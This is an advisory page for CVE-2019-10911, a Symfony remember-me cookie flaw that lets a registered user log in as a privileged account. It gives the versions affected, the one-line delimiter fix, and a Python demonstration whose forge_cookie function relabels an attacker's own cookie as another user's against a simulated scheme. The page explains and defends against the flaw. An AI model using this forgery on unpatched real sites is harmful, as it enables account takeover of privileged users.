CVE-2019-10911
Description
In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, a vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled. This is related to symfony/security.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Symfony remember-me authentication bypass: on sites with user registration and remember-me login enabled, an attacker can authenticate as a privileged user.
The symfony/security component computed the remember-me cookie hash over the user class, username, expiry timestamp and stored password concatenated with no separator, so the boundaries between the fields were ambiguous. An attacker who can pick a username can therefore obtain a legitimate cookie for their own account whose hash also validates for a different username/expiry split of the same string. Affected releases are 2.7.x before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12 and 4.2.x before 4.2.7. [1]
Preconditions: the attacker must be able to register an account (to choose the username) and the site must have remember-me login enabled. CVSS rates the attack complexity as high because of these conditions. The flaw is in the symfony/security component (shipped on Packagist as symfony/security, symfony/security-http and symfony/symfony). [2]
Successful exploitation lets the attacker log in as a privileged user. The CVSS score is 7.5 (Symfony severity: Important), with high confidentiality, integrity and availability impact. [2]
The fix (commit a29ce2817cf4) inserts a delimiter between the hashed fields. Upgrade to 2.7.51, 2.8.50, 3.4.26, 4.1.12 or 4.2.7 or later; no workaround is documented. [1]
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package (Packagist) | Affected versions | Patched versions |
|---|---|---|
| symfony/security-http | >= 2.7.0, < 2.7.51 | 2.7.51 |
| symfony/security-http | >= 2.8.0, < 2.8.50 | 2.8.50 |
| symfony/security-http | >= 3.0.0, < 3.4.26 | 3.4.26 |
| symfony/security-http | >= 4.0.0, < 4.1.12 | 4.1.12 |
| symfony/security-http | >= 4.2.0, < 4.2.7 | 4.2.7 |
| symfony/security | >= 2.7.0, < 2.7.51 | 2.7.51 |
| symfony/security | >= 2.8.0, < 2.8.50 | 2.8.50 |
| symfony/security | >= 3.0.0, < 3.4.26 | 3.4.26 |
| symfony/security | >= 4.0.0, < 4.1.12 | 4.1.12 |
| symfony/security | >= 4.2.0, < 4.2.7 | 4.2.7 |
| symfony/symfony | >= 2.7.0, < 2.7.51 | 2.7.51 |
| symfony/symfony | >= 2.8.0, < 2.8.50 | 2.8.50 |
| symfony/symfony | >= 3.0.0, < 3.4.26 | 3.4.26 |
| symfony/symfony | >= 4.0.0, < 4.1.12 | 4.1.12 |
| symfony/symfony | >= 4.2.0, < 4.2.7 | 4.2.7 |
Affected products
- Symfony/Symfony (GitHub advisory coordinates; no CPE assigned): version ranges starting at >= 2.7.0, < 2.7.51, as listed in the Affected packages table above.
Patches
a29ce2817cf4 [Security] Add a separator in the remember me cookie hash
1 file changed · +1 −1
src/Symfony/Component/Security/Http/RememberMe/TokenBasedRememberMeServices.php+1 −1 modified@@ -120,6 +120,6 @@ protected function generateCookieValue($class, $username, $expires, $password) */ protected function generateCookieHash($class, $username, $expires, $password) { - return hash_hmac('sha256', $class.$username.$expires.$password, $this->getSecret()); + return hash_hmac('sha256', $class.self::COOKIE_DELIMITER.$username.self::COOKIE_DELIMITER.$expires.self::COOKIE_DELIMITER.$password, $this->getSecret()); } }
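Review bot: In generateCookieHash(), inserting self::COOKIE_DELIMITER between $class, $username, $expires and $password removes the ambiguity only as long as no field can itself contain that character; $expires is numeric and $class is not caller-chosen, but $username is, so a username containing the delimiter would again make the hashed string ambiguous. Consider rejecting or encoding usernames that contain self::COOKIE_DELIMITER before this method is reached, or hashing a length-prefixed encoding of each field rather than a delimited string. A one-line docblock note on why the separator matters would also help the next reader, since the method's signature and name give no hint.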
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
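The field-boundary ambiguity behind this advisory and the effect of the separator added by the patch, as an added example in Python that is not Symfony's code and not taken from the advisory. It models the cookie scheme visible in the patched method: base64(class:username:expires:hash) with the hash an HMAC over the four fields. The secret, user class, user table, expiry time and the names cookie_hash, make_cookie, verify_cookie, forge_cookie and demo are all constructed for the illustration. It assumes the two accounts carry identical stored-password values, since that field is also hashed and is not controllable from the cookie. The attacker's legitimate cookie for the registered username "admin1" is relabelled as "admin" by moving the trailing "1" of the username onto the front of the expiry field; the concatenated hash still verifies (and the lengthened expiry is far in the future), while the delimited hash rejects it.

```python
import base64
import hashlib
import hmac
import time

# Constructed values for this illustration (not Symfony's): app secret,
# user class name, and a user table mapping username -> stored password value.
SECRET = b"constructed-app-secret"
DELIM = ":"                      # plays the role of COOKIE_DELIMITER
USER_CLASS = "App\\Entity\\User"
USERS = {
    "admin": "$stored-password-value$",   # the target account
    "admin1": "$stored-password-value$",  # the attacker's registered account,
}                                          # same stored value by assumption


def cookie_hash(user_class, username, expires, password, separated):
    """HMAC over the four fields: concatenated (vulnerable) or delimited (fixed)."""
    fields = [user_class, username, str(expires), password]
    msg = DELIM.join(fields) if separated else "".join(fields)
    return hmac.new(SECRET, msg.encode(), hashlib.sha256).hexdigest()


def make_cookie(username, lifetime, separated, now=None):
    """Issue a remember-me cookie for a known user: base64(class:user:expires:hash)."""
    now = int(time.time()) if now is None else now
    expires = now + lifetime
    h = cookie_hash(USER_CLASS, username, expires, USERS[username], separated)
    raw = DELIM.join([USER_CLASS, username, str(expires), h])
    return base64.b64encode(raw.encode()).decode()


def verify_cookie(cookie, separated, now=None):
    """Return the authenticated username, or None if the cookie is rejected."""
    now = int(time.time()) if now is None else now
    parts = base64.b64decode(cookie).decode().split(DELIM)
    if len(parts) != 4:
        return None
    user_class, username, expires, h = parts
    if not expires.isdigit() or int(expires) < now:
        return None                            # expired or malformed timestamp
    password = USERS.get(username)
    if password is None:
        return None                            # unknown user
    expected = cookie_hash(user_class, username, expires, password, separated)
    return username if hmac.compare_digest(expected, h) else None


def forge_cookie(own_cookie, target_username):
    """Relabel the attacker's own cookie as the target: the part of the attacker's
    username that extends the target's is moved onto the front of the expiry
    field, so username+expires concatenates to exactly the same string."""
    user_class, username, expires, h = base64.b64decode(own_cookie).decode().split(DELIM)
    if not username.startswith(target_username):
        raise ValueError("attacker's username must extend the target's username")
    shifted_expires = username[len(target_username):] + expires
    raw = DELIM.join([user_class, target_username, shifted_expires, h])
    return base64.b64encode(raw.encode()).decode()


def demo(now=1_700_000_000):
    """For each hash scheme: (who the attacker's own cookie logs in as,
    who the forged cookie logs in as)."""
    results = {}
    for separated in (False, True):
        own = make_cookie("admin1", 3600, separated, now)
        forged = forge_cookie(own, "admin")
        results["separated" if separated else "concatenated"] = (
            verify_cookie(own, separated, now),
            verify_cookie(forged, separated, now),
        )
    return results


if __name__ == "__main__":
    print(demo())  # {'concatenated': ('admin1', 'admin'), 'separated': ('admin1', None)}
```

The forged cookie passes the expiry check precisely because prepending a digit makes the timestamp larger, not smaller, so the ambiguity works in the attacker's favour. Note that the delimited scheme still depends on usernames not containing the delimiter character; a registration check for that, or a length-prefixed encoding of each field, closes the remaining gap.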
References
- github.com/advisories/GHSA-cchx-mfrc-fwqr (GitHub Security Advisory)
- nvd.nist.gov/vuln/detail/CVE-2019-10911 (NVD advisory)
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2019-10911.yaml (FriendsOfPHP advisory entry)
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2019-10911.yaml (FriendsOfPHP advisory entry)
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10911.yaml (FriendsOfPHP advisory entry)
- github.com/symfony/symfony/commit/a29ce2817cf43bb1850cf6af114004ac26c7a081 (fix commit; vendor-confirmed)
- symfony.com/blog/cve-2019-10911-add-a-separator-in-the-remember-me-cookie-hash (vendor advisory; vendor-confirmed)
- symfony.com/cve-2019-10911 (vendor advisory)
- www.synology.com/security/advisory/Synology_SA_19_19 (third-party advisory; confirmed)